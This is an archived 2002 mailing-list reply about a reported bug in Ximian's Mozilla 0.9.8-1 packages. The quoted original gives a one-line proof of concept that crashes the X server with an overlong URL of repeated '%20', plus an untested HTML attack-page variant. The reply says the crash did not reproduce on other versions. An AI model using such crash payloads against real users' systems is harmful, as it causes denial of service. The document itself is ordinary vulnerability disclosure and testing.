Vulnerability Development mailing list archives
Re: Ximian Mozilla: The 2618 Bug
From: NyQuist <NyQuist () ntlworld com>
Date: 17 Feb 2002 17:48:17 +0000
On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't make it since this doesn't seem to affect a redhat itself, it affects the mozilla packages distrbuted by Ximian: The test system look like: bash#~ rpm -qa | grep mozilla mozilla-0.9.8-1.ximian.2 mozilla-mail-0.9.8-1.ximian.2 mozilla-xmlterm-0.9.8-1.ximian.2 mozilla-devel-0.9.8-1.ximian.2 nautilus-mozilla-1.0.6-ximian.4 mozilla-psm-0.9.8-1.ximian.2 kdebindings-kmozilla-2.1.1-1 This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the the updates). There is a bug in mozilla 0.9.8-1 which allows you to Crash the X server. I won't go into details I'll just show the proof of concept. exploit: Local: bash#~ mozilla `perl -e "print '%20' x 2618"` Remote: I haven't test this but i guess: echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >> ./attack.html perhaps using "img src" or java script... Best Regards -- /* Rodrigo Gutierrez <rodrigo () trustix com> Trustix AS http://www.trustix.com */
One one box: rpm -qa | grep mozilla mozilla-chat-0.9.7-1 mozilla-mail-0.9.7-1 nautilus-mozilla-1.0.6-ximian.6 mozilla-0.9.7-1 mozilla-devel-0.9.7-1 mozilla-js-debugger-0.9.7-1 mozilla-psm-0.9.7-1 mozilla-dom-inspector-0.9.7-1 Results in "www.perl -e "print %20 x 2618".com could not be found (lol) perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't overflow perl. On other box: rpm -qa | grep mozilla nautilus-mozilla-1.0.6-ximian.6 mozilla-psm-0.9.8-2 mozilla-0.9.8-2 mozilla-devel-0.9.8-2 Results in same 'not found' error. The attack.html (as per your script) results in "www.'perl not found". So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in 0.9.8-2. -- NyQuist | Matthew Hall -- NyQuist at ntlworld dot com Sig: Microsoft sells you Windows. Linux gives you the whole house.
Current thread:
- Ximian Mozilla: The 2618 Bug Replugge [Rod] (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug Vadim Berezniker (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug Replugge [Rod] (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug NyQuist (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug NyQuist (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug Vadim Berezniker (Feb 17)